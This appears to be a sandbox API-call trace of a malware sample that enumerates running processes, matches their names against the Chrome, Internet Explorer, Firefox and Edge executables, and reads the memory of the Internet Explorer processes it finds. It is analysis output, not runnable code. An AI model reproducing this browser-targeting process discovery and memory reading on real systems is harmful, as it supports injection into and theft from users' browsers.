	[0224.742] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0224.743] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x5b30
	[0224.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.743] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0224.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.743] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.744] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0224.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.744] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.744] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0224.745] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x5b34
	[0224.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.745] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0224.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.746] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.746] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0224.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.746] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.746] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0224.747] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x5b38
	[0224.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.747] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0224.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.747] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.748] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0224.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.748] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.749] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0224.749] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x5b3c
	[0224.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.749] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0224.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.750] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.751] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0224.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.751] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.751] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0224.752] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0224.752] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0224.753] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x5b40
	[0224.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.753] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0224.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.754] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.754] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0224.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.755] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.755] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0224.756] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x5b44
	[0224.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.756] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0224.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.756] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.757] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0224.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.757] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.757] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0224.758] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x5b48
	[0224.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.758] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0224.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.759] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.759] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0224.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.759] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.759] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0224.760] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x5b4c
	[0224.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.760] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0224.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.761] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.761] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0224.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.761] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.762] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0224.763] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x5b50
	[0224.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.763] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0224.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.763] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.764] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0224.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.764] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.765] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0224.766] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x5b54
	[0224.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.766] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0224.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.766] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.767] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0224.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.767] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.767] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0224.768] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x5b58
	[0224.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.768] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0224.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.769] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.769] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0224.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.769] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.770] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0224.770] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x5b5c
	[0224.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.771] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0224.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.771] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.772] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0224.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.772] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.772] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0224.773] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x5b60
	[0224.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.773] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0224.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.774] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.774] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0224.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.774] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.774] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0224.775] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x5b64
	[0224.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.775] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0224.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.775] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.776] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0224.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.776] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.776] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0224.777] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x5b68
	[0224.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.777] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0224.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.777] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.778] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0224.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.778] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.779] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0224.779] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x5b6c
	[0224.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.780] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0224.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.780] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.781] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0224.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.782] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.782] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0224.783] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x5b70
	[0224.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.783] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0224.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.784] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.785] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0224.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.785] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.785] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0224.786] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x5b74
	[0224.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.786] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0224.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.787] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.788] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0224.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.788] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.789] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0224.790] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x5b78
	[0224.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.790] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0224.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.790] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.791] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0224.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.791] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.792] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0224.792] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x5b7c
	[0224.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.792] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0224.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.793] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0224.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.793] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0224.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.793] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.794] NtQueryInformationProcess (in: ProcessHandle=0x5b7c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0224.794] ReadProcessMemory (in: hProcess=0x5b7c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0224.794] ReadProcessMemory (in: hProcess=0x5b7c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0224.794] ReadProcessMemory (in: hProcess=0x5b7c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0224.794] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0224.794] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0224.795] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x5b80
	[0224.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.795] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0224.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.795] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0224.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.795] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0224.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.796] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.796] NtQueryInformationProcess (in: ProcessHandle=0x5b80, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0224.796] ReadProcessMemory (in: hProcess=0x5b80, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0224.796] ReadProcessMemory (in: hProcess=0x5b80, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0224.796] ReadProcessMemory (in: hProcess=0x5b80, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0224.797] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0224.797] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0224.798] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x5b84
	[0224.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.798] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0224.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.798] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.799] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0224.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.799] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
